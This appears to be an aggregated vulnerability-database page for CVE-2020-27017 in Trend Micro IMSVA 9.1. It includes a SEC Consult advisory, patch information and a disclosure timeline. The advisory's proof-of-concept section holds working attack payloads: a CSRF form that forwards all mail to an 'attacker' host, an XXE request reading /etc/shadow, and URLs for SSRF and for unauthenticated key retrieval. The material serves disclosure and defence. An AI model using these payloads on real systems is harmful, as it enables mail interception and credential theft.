CVE-2020-27017 (GCVE-0-2020-27017)

Vulnerability from cvelistv5 – Published: 2020-11-09 23:10 – Updated: 2024-08-04 16:03

Summary

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability.

Severity ?

No CVSS data available.

CWE

Assigner

trendmicro

References

URL

	Vendor	Product	Version
	Trend Micro	Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)	Affected: 9.1

FKIE_CVE-2020-27017

Vulnerability from fkie_nvd - Published: 2020-11-09 23:15 - Updated: 2024-11-21 05:20

Severity ?

4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security@trendmicro.com	https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/	Exploit, Third Party Advisory
security@trendmicro.com	https://success.trendmicro.com/solution/000279833	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://success.trendmicro.com/solution/000279833	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	trendmicro	interscan_messaging_security_virtual_appliance	*
	microsoft	windows	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:trendmicro:interscan_messaging_security_virtual_appliance:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B200642A-40B5-46AD-815B-C844CBFF5EC2",
              "versionEndIncluding": "9.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability."
    },
    {
      "lang": "es",
      "value": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) versi\u00f3n 9.1, es susceptible a una vulnerabilidad de tipo XML External Entity Processing (XXE) que podr\u00eda permitir a un administrador autenticado leer archivos locales arbitrarios.\u0026#xa0;Un atacante ya debe haber obtenido privilegios de administrator/root del producto para explotar esta vulnerabilidad"
    }
  ],
  "id": "CVE-2020-27017",
  "lastModified": "2024-11-21T05:20:41.063",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 4.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-11-09T23:15:12.147",
  "references": [
    {
      "source": "security@trendmicro.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/"
    },
    {
      "source": "security@trendmicro.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://success.trendmicro.com/solution/000279833"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://success.trendmicro.com/solution/000279833"
    }
  ],
  "sourceIdentifier": "security@trendmicro.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

VAR-202011-0744

Vulnerability from variot - Updated: 2024-11-23 21:35

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. Attackers can use the vulnerability to read arbitrary local files. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 >

          title: Multiple Vulnerabilities
        product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)

vulnerable version: < 9.1.0 Critical Patch Build 2025 fixed version: 9.1.0 Critical Patch - Build 2025 CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019 CVE-2020-27693, CVE-2020-27694 impact: High homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html found: 2020-04 by: W. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab

                 An integrated part of SEC Consult
                 Europe | Asia | North America

                 https://www.sec-consult.com

=======================================================================

Vendor description:

"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)."

URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html

Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description:

1) Cross-Site Request Forgery (CSRF CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

A web service accessible to authenticated administrators allows modifying the appliance's policy configuration. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page.

2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)

The web service from vulnerability #1 accepts requests in the form of XML documents.

3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow).

4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)

A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files.

5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)

An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication.

Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations.

6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)

The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily.

7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)

Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system.

SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system.

Proof of concept:

1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker:

--- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374

attacker:25 --- snip ---

The following HTML fragment shows how this request can be sent in a CSRF scenario:

--- snip ---

2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow

--- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290

<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
&xxe;

--- snip ---

3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible.

Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root.

Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands.

Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected.

4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance:

https://:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test

When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved.

5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key:

https://:8445/widget/repository/inc/class/common/crypt/crypt.key

Moreover, an SQLite database can be retrieved. https://:8445/widget/repository/db/sqlite/tmwf.db

The contents of these files have not been further investigated.

6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily.

7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)

The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages.

Vulnerable / tested versions:

Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well.

Vendor contact timeline:

2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory

Solution:

The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt

Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz

Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833

Workaround:

No workaround available.

Advisory URL:

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2020

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202011-0744",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "trendmicro",
        "version": "9.1"
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30c8\u30ec\u30f3\u30c9\u30de\u30a4\u30af\u30ed",
        "version": null
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30c8\u30ec\u30f3\u30c9\u30de\u30a4\u30af\u30ed",
        "version": null
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "trend micro",
        "version": "9.1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Wolfgang Ettlinger",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-27017",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2020-27017",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2021-08545",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2020-27017",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-27017",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-27017",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2020-27017",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-08545",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202011-333",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. Attackers can use the vulnerability to read arbitrary local files. SEC Consult Vulnerability Lab Security Advisory \u003c 20201104-0 \u003e\n=======================================================================\n              title: Multiple Vulnerabilities\n            product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)\n vulnerable version: \u003c 9.1.0 Critical Patch Build 2025\n      fixed version: 9.1.0 Critical Patch - Build 2025\n         CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019\n                     CVE-2020-27693, CVE-2020-27694\n             impact: High\n           homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html\n              found: 2020-04\n                 by: W. Ettlinger (Office Vienna)\n                     T. Serafin (Office Munich)\n                     SEC Consult Vulnerability Lab\n\n                     An integrated part of SEC Consult\n                     Europe | Asia | North America\n\n                     https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"Trend Micro\u2122 InterScan\u2122 Messaging Security provides the most comprehensive\nprotection against both traditional and targeted attacks. Using the correlated\nintelligence from Trend Micro\u2122 Smart Protection Network\u2122 and optional sandbox\nexecution analysis, it blocks spam, phishing, and advanced persistent threats\n(APTs).\"\n\nURL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately. \n\nSEC Consult highly recommends to perform a thorough security review of this\nand similar Trend Micro products conducted by security professionals to\nidentify and resolve potential further security issues. \n\n\nVulnerability overview/description:\n-----------------------------------\n1) Cross-Site Request Forgery (CSRF\nCVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\nA web service accessible to authenticated administrators allows modifying the\nappliance\u0027s policy configuration. This web service can also be accessed by\nleveraging a CSRF scenario. An attacker could therefore modify policy rules\n(e.g. bypass malware checks or forward all mails to another host) by tricking\nan authenticated administrator into accessing an attacker-controlled web page. \n\n\n2) XML External Entity Processing (XXE)\nCVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)\n\nThe web service from vulnerability #1 accepts requests in the form of XML documents. \n\n\n3) Over-privileged Users/Services\nSudo is configured to allow several system users access to the root account. \nAn attacker gaining control over one of these accounts can access the system as\nroot. Moreover, several services are executed with the privileges of the user\nroot. Therefore, finding #2 allows an attacker to read files only accessible to\nroot (e.g. /etc/shadow). \n\n\n4) Server Side Request Forgery (SSRF) \u0026 Local File Disclosure\nCVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)\n\nA script accessible through the appliance\u0027s web server can be abused to request\nany URL (e.g. http(s), file). An authenticated attacker can e.g. access any\nhttp(s) resources or parts of some local files. \n\n\n5) Information Disclosure\nCVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)\n\nAn SQLite database as well as a cryptographic key located in the webroot can be\naccessed without authentication. \n\nNote: It is unclear what the key is used for and whether the SQLite database\ncould contain sensitive information in specific configurations. \n\n\n6) Insufficient Password Storage\nCVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)\n\nThe appliance stores passwords of administrative users as unsalted MD5 hashes\nwhich can be cracked easily. \n\n\n7) Outdated Software\nCVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)\n\nSeveral software components installed on the appliance are outdated. Moreover,\nthe software updates provided by Trend Micro do not update the packages of the\nCentOS base system. \n\nSEC Consult did not verify whether the vulnerabilities identified through the\nversion information are present or whether the vulnerabilities have an impact\non the security of the system. \n\n\nProof of concept:\n-----------------\n1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016)\nThe following request will create a rule that forwards all mails to an attacker:\n\n--- snip ---\nPOST /ws_policies.imss HTTP/1.1\nHost: [...]\nCookie: JSESSIONID=[...];\nContent-Length: 374\n\n\u003cpolicies\u003e\n \u003cpolicy\n     name=\"forward all traffic to attacker\"\n     note=\"forward all traffic to attacker\"\n     enable=\"yes\"\n     version=\"1\"\n     order=\"1\"\n     type=\"other\"\u003e\n  \u003croute direction=\"incoming\"\u003e\n   \u003cfrom anyone=\"yes\"\u003e\u003c/from\u003e\n   \u003cto anyone=\"yes\"\u003e\u003c/to\u003e\n  \u003c/route\u003e\n  \u003cactions\u003e\n   \u003chand_off\u003eattacker:25\u003c/hand_off\u003e\n  \u003c/actions\u003e\n \u003c/policy\u003e\n\u003c/policies\u003e\n--- snip ---\n\nThe following HTML fragment shows how this request can be sent in a CSRF\nscenario:\n\n--- snip ---\n\u003cform action=\"https://[...]:8445/ws_policies.imss\" method=\"POST\"\n      enctype=\"text/plain\"\u003e\n  \u003cinput type=\"hidden\" name=\u0027\u003cpolicies\u003e\u003cpolicy name\u0027\n      value=\u0027\"forward all traffic to attacker\"\n      note=\"forward all traffic to attacker\"\n      enable=\"yes\" version=\"1\" order=\"1\"  type=\"other\"\u003e\n      \u003croute direction=\"incoming\"\u003e\u003cfrom anyone=\"yes\"\u003e\u003c/from\u003e\n      \u003cto anyone=\"yes\"\u003e\u003c/to\u003e\u003c/route\u003e\n      \u003cactions\u003e\u003chand_off\u003eattacker:25\u003c/hand_off\u003e\u003c/actions\u003e\n      \u003c/policy\u003e\u003c/policies\u003e\u0027 /\u003e\n  \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n\u003c/form\u003e\n--- snip ---\n\n\n2) XML External Entity Processing (XXE) (CVE-2020-27017)\nThe following request demonstrates the retrieval of /etc/shadow\n\n--- snip ---\nPOST /ws_policies.imss HTTP/1.1\nHost: [...]:8445\nCookie: JSESSIONID=[...];\nContent-Length: 290\n\n\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY \u003e\n \u003c!ENTITY xxe SYSTEM  \"file:///etc/shadow\" \u003e]\u003e\n\u003cpolicies\u003e\n \u003cpolicy name=\"test\" note=\"test\" enable=\"yes\" version=\"1\" order=\"2\" type=\"virus\"\u003e\n  \u003croute direction=\"incoming\"\u003e\n  \u003cfrom anyone=\"no\"\u003e\n   \u003cgroup\u003e\u0026xxe;\u003c/group\u003e\n  \u003c/from\u003e\n  \u003c/route\u003e\n \u003c/policy\u003e\n\u003c/policies\u003e\n--- snip ---\n\n\n3) Over-privileged Users/Services\nThe local users \"admin\", \"enable\" and all users in the group \"cliusers\" can execute\ncommands as root (no password entry required). Note that at least for the users\n\"admin\" and \"enable\" a restricted shell is configured, thus shell access is not\neasily possible. \n\nSeveral network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. \n\nTrend Micro supplied the following additional information:\n(a) If an IMSVA user created clish users, they can only run limited commands\n    (IMSVA pre-defined commands) and all of these are one time commands\n    (not a running service in the backend)\n(b) Most of these clish commands only read logs, and does not accept any arguments,\n    so it cannot terminate or inject commands. \n(c) Few commands (such as ping) only accept few arguments (such as IP), but these\n    are well-checked. Users cannot input any arguments with other meaning, so it\n    cannot terminate or inject commands. \n\nTrend Micro decided not to include vulnerability #3 in the hardening/patch of the\nproduct as admin and enabled accounts are as important as root and changing the\narchitecture would cause some functions not to work as expected. \n\n\n4) Server Side Request Forgery (SSRF) \u0026 Local File Disclosure (CVE-2020-27018)\nThe URL demonstrates the retrieval of an HTTP URL through the appliance:\n\nhttps://\u003chost\u003e:8445/widget/proxy_controller.php?module=modSimple\u0026userGenerated=1\u0026serverid=1\u0026url=http://test\n\nWhen accessing file:// URLs, the application sends only the content that follows\na sequence \\r\\n\\r\\n. Therefore only parts of certain files can be retrieved. \n\n\n5) Information Disclosure (CVE-2020-27019)\nThe following URL demonstrates the 